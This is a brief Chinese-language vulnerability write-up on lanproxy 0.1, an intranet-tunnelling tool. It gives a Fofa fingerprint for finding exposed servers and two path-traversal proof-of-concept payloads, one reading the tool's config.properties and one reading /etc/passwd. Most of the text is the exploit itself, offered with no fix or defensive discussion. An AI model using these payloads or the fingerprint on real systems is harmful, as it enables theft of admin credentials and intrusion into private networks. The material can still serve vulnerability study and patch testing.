漏洞描述
lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具。攻击者通过构造恶意请求,可直接获取到lanproxy配置文件,从而登录lanproxy管理后台进入内网。
影响版本
lanproxy 0.1
Fofa
header= "Server: LPS-0.1"
漏洞利用
读取配置文件
POC:
/../conf/config.properties
读取/etc/passwd
/../../../../../../../../../../etc/passwd